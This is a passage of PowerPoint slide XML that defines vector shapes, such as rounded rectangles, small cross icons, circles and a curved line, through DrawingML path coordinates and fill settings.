              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C618A3-D9F8-5E8D-744A-CB307BCAB511}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6023614" y="3372192"/>
              <a:ext cx="945139" cy="512182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="47934" h="25976" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2740" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1210" y="0"/>
                    <a:pt x="1" y="1233"/>
                    <a:pt x="1" y="2739"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="23236"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="24743"/>
                    <a:pt x="1210" y="25975"/>
                    <a:pt x="2740" y="25975"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45195" y="25975"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46701" y="25975"/>
                    <a:pt x="47934" y="24743"/>
                    <a:pt x="47934" y="23236"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="47934" y="2739"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="47934" y="1233"/>
                    <a:pt x="46701" y="0"/>
                    <a:pt x="45195" y="0"/>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40" name="Google Shape;1408;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF6CCF0F-3BA5-767F-3BC9-259A2791B2CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6017758" y="3366789"/>
              <a:ext cx="956397" cy="523421"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="48505" h="26546" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="45492" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="46838" y="571"/>
                    <a:pt x="47934" y="1666"/>
                    <a:pt x="47934" y="3013"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="47934" y="23510"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="47934" y="24857"/>
                    <a:pt x="46838" y="25975"/>
                    <a:pt x="45492" y="25975"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3037" y="25975"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="25975"/>
                    <a:pt x="571" y="24857"/>
                    <a:pt x="571" y="23510"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="571" y="3013"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="1666"/>
                    <a:pt x="1667" y="571"/>
                    <a:pt x="3037" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3037" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1370" y="0"/>
                    <a:pt x="1" y="1347"/>
                    <a:pt x="1" y="3013"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="23510"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="25176"/>
                    <a:pt x="1370" y="26546"/>
                    <a:pt x="3037" y="26546"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45492" y="26546"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="47158" y="26546"/>
                    <a:pt x="48505" y="25176"/>
                    <a:pt x="48505" y="23510"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="48505" y="3013"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="48505" y="1347"/>
                    <a:pt x="47158" y="0"/>
                    <a:pt x="45492"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41" name="Google Shape;1409;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A39DD49C-564D-2EB3-A5C9-D32E16C0F7D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6087519" y="3431246"/>
              <a:ext cx="54933" cy="53927"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2786" h="2735" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2466" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2392" y="1"/>
                    <a:pt x="2317" y="29"/>
                    <a:pt x="2260" y="86"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="92" y="2255"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2369"/>
                    <a:pt x="1" y="2552"/>
                    <a:pt x="92" y="2643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="2711"/>
                    <a:pt x="229" y="2734"/>
                    <a:pt x="297" y="2734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="2734"/>
                    <a:pt x="457" y="2711"/>
                    <a:pt x="503" y="2643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2671" y="497"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="383"/>
                    <a:pt x="2785" y="201"/>
                    <a:pt x="2671" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2614" y="29"/>
                    <a:pt x="2540" y="1"/>
                    <a:pt x="2466"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42" name="Google Shape;1410;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A37C228-3BE2-CCF8-1051-3BE616B94C8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6087519" y="3431246"/>
              <a:ext cx="54933" cy="53927"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2786" h="2735" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="297" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="1"/>
                    <a:pt x="149" y="29"/>
                    <a:pt x="92" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="201"/>
                    <a:pt x="1" y="383"/>
                    <a:pt x="92" y="497"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2260" y="2643"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2329" y="2711"/>
                    <a:pt x="2397" y="2734"/>
                    <a:pt x="2466" y="2734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2534" y="2734"/>
                    <a:pt x="2603" y="2711"/>
                    <a:pt x="2671" y="2643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="2552"/>
                    <a:pt x="2785" y="2369"/>
                    <a:pt x="2671" y="2255"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="503" y="86"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="29"/>
                    <a:pt x="372" y="1"/>
                    <a:pt x="297"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43" name="Google Shape;1411;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F2E0B33-577D-6FC7-EA26-87AAA328B255}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6309854" y="3097192"/>
              <a:ext cx="194434" cy="308756"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9861" h="15659" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="297" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="1"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="434"/>
                    <a:pt x="137" y="571"/>
                    <a:pt x="297" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1553" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3127" y="571"/>
                    <a:pt x="4406" y="1850"/>
                    <a:pt x="4406" y="3425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4406" y="6826"/>
                    <a:pt x="5730" y="8400"/>
                    <a:pt x="7008" y="9930"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8172" y="11322"/>
                    <a:pt x="9290" y="12646"/>
                    <a:pt x="9290" y="15362"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9290" y="15522"/>
                    <a:pt x="9404" y="15659"/>
                    <a:pt x="9564" y="15659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9724" y="15659"/>
                    <a:pt x="9861" y="15522"/>
                    <a:pt x="9861" y="15362"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9861" y="12441"/>
                    <a:pt x="8628" y="10980"/>
                    <a:pt x="7441" y="9565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6232" y="8104"/>
                    <a:pt x="4976" y="6620"/>
                    <a:pt x="4976" y="3425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4976" y="1530"/>
                    <a:pt x="3424" y="1"/>
                    <a:pt x="1553"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44" name="Google Shape;1412;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8283B94-345A-DC77-D36B-03F8CAF34835}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6477275" y="3400092"/>
              <a:ext cx="42767" cy="42767"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2169" h="2169" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1073" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="0"/>
                    <a:pt x="0" y="502"/>
                    <a:pt x="0" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1689"/>
                    <a:pt x="480" y="2169"/>
                    <a:pt x="1073" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="2169"/>
                    <a:pt x="2169" y="1689"/>
                    <a:pt x="2169" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="502"/>
                    <a:pt x="1667" y="0"/>
                    <a:pt x="1073"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45" name="Google Shape;1413;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BE113C-A5AB-8128-70FA-CA10418774C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6471419" y="3394690"/>
              <a:ext cx="54026" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2740" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1370" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1827" y="571"/>
                    <a:pt x="2169" y="936"/>
                    <a:pt x="2169" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="1803"/>
                    <a:pt x="1827" y="2169"/>
                    <a:pt x="1370" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="937" y="2169"/>
                    <a:pt x="571" y="1803"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="936"/>
                    <a:pt x="937" y="571"/>
                    <a:pt x="1370" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1370" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="617" y="0"/>
                    <a:pt x="1" y="617"/>
                    <a:pt x="1" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2123"/>
                    <a:pt x="617" y="2739"/>
                    <a:pt x="1370" y="2739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="2739"/>
                    <a:pt x="2740" y="2123"/>
                    <a:pt x="2740" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2740" y="617"/>
                    <a:pt x="2123" y="0"/>
                    <a:pt x="1370"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46" name="Google Shape;1414;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C9AD905-53CB-4913-0995-A760D239047A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6272942" y="3081438"/>
              <a:ext cx="42787" cy="42787"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2170" h="2170" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1096" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="1"/>
                    <a:pt x="1" y="480"/>
                    <a:pt x="1" y="1074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1667"/>
                    <a:pt x="480" y="2169"/>
                    <a:pt x="1096" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1690" y="2169"/>
                    <a:pt x="2169" y="1667"/>
                    <a:pt x="2169" y="1074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="480"/>
                    <a:pt x="1690" y="1"/>
                    <a:pt x="1096"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47" name="Google Shape;1415;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D777C9-0AD5-AD3B-BEE2-7F1321B3C878}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6267540" y="3075601"/>
              <a:ext cx="53592" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2718" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1370" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1804" y="571"/>
                    <a:pt x="2146" y="936"/>
                    <a:pt x="2146" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2146" y="1803"/>
                    <a:pt x="1804" y="2169"/>
                    <a:pt x="1370" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="914" y="2169"/>
                    <a:pt x="571" y="1803"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="936"/>
                    <a:pt x="914" y="571"/>
                    <a:pt x="1370" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1370" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="617" y="0"/>
                    <a:pt x="1" y="616"/>
                    <a:pt x="1" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2123"/>
                    <a:pt x="617" y="2739"/>
                    <a:pt x="1370" y="2739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="2739"/>
                    <a:pt x="2717" y="2123"/>
                    <a:pt x="2717" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2717" y="616"/>
                    <a:pt x="2124" y="0"/>
                    <a:pt x="1370"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48" name="Google Shape;1416;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFEADA15-77E8-7BC0-28F3-4C00A777A024}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5294520" y="1830284"/>
              <a:ext cx="522080" cy="712019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="26478" h="36111" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2740" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1233" y="1"/>
                    <a:pt x="1" y="1210"/>
                    <a:pt x="1" y="2740"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="33371"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="34901"/>
                    <a:pt x="1233" y="36110"/>
                    <a:pt x="2740" y="36110"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="23739" y="36110"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="25268" y="36110"/>
                    <a:pt x="26478" y="34901"/>
                    <a:pt x="26478" y="33371"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26478" y="2740"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="26478" y="1210"/>
                    <a:pt x="25268" y="1"/>
                    <a:pt x="23739" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2970AA">
                <a:alpha val="3482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49" name="Google Shape;1417;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{337DF9FE-6CB6-ECB0-405A-17B2E9C8ED4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5242308" y="1777638"/>
              <a:ext cx="522100" cy="712452"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="26479" h="36133" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2740" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1211" y="0"/>
                    <a:pt x="1" y="1233"/>
                    <a:pt x="1" y="2739"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="33393"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="34900"/>
                    <a:pt x="1211" y="36133"/>
                    <a:pt x="2740" y="36133"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="23739" y="36133"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="25246" y="36133"/>
                    <a:pt x="26478" y="34900"/>
                    <a:pt x="26478" y="33393"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26478" y="2739"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="26478" y="1233"/>
                    <a:pt x="25246" y="0"/>
                    <a:pt x="23739" y="0"/>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50" name="Google Shape;1418;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D443C7AE-509F-16FA-F9FB-DFE039353748}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5236471" y="1771782"/>
              <a:ext cx="533339" cy="723711"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="27049" h="36704" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="24035" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25382" y="571"/>
                    <a:pt x="26477" y="1689"/>
                    <a:pt x="26477" y="3036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26477" y="33690"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="26477" y="35037"/>
                    <a:pt x="25382" y="36133"/>
                    <a:pt x="24035" y="36133"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3036" y="36133"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1666" y="36133"/>
                    <a:pt x="571" y="35037"/>
                    <a:pt x="571" y="33690"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="571" y="3036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="1689"/>
                    <a:pt x="1666" y="571"/>
                    <a:pt x="3036" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3036" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1347" y="0"/>
                    <a:pt x="0" y="1370"/>
                    <a:pt x="0" y="3036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="33690"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35357"/>
                    <a:pt x="1347" y="36703"/>
                    <a:pt x="3036" y="36703"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24035" y="36703"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="25701" y="36703"/>
                    <a:pt x="27048" y="35357"/>
                    <a:pt x="27048" y="33690"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="27048" y="3036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27048" y="1370"/>
                    <a:pt x="25701" y="0"/>
                    <a:pt x="24035"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51" name="Google Shape;1419;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8316A032-D3F3-E5F2-70D2-D8D00F902231}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5305778" y="1836692"/>
              <a:ext cx="55367" cy="53927"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2808" h="2735" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2488" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2414" y="1"/>
                    <a:pt x="2340" y="29"/>
                    <a:pt x="2283" y="87"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="114" y="2255"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2369"/>
                    <a:pt x="0" y="2529"/>
                    <a:pt x="114" y="2643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="2711"/>
                    <a:pt x="251" y="2734"/>
                    <a:pt x="320" y="2734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="2734"/>
                    <a:pt x="457" y="2711"/>
                    <a:pt x="525" y="2643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2694" y="497"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2808" y="383"/>
                    <a:pt x="2808" y="201"/>
                    <a:pt x="2694" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2636" y="29"/>
                    <a:pt x="2562" y="1"/>
                    <a:pt x="2488"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52" name="Google Shape;1420;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C03F30C-FFAD-28A7-4797-C7699E1DA0E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5305778" y="1836692"/>
              <a:ext cx="55367" cy="53927"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2808" h="2735" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="320" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="1"/>
                    <a:pt x="171" y="29"/>
                    <a:pt x="114" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="201"/>
                    <a:pt x="0" y="383"/>
                    <a:pt x="114" y="497"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2283" y="2643"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2328" y="2711"/>
                    <a:pt x="2420" y="2734"/>
                    <a:pt x="2488" y="2734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2557" y="2734"/>
                    <a:pt x="2625" y="2711"/>
                    <a:pt x="2694" y="2643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2808" y="2529"/>
                    <a:pt x="2808" y="2369"/>
                    <a:pt x="2694" y="2255"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="525" y="87"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="468" y="29"/>
                    <a:pt x="394" y="1"/>
                    <a:pt x="320"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53" name="Google Shape;1421;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D90157B-AAFE-19F9-75A1-006DF63376A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5701371" y="1946400"/>
              <a:ext cx="247100" cy="108032"/>
            </a:xfrm>
            <a:custGeom>
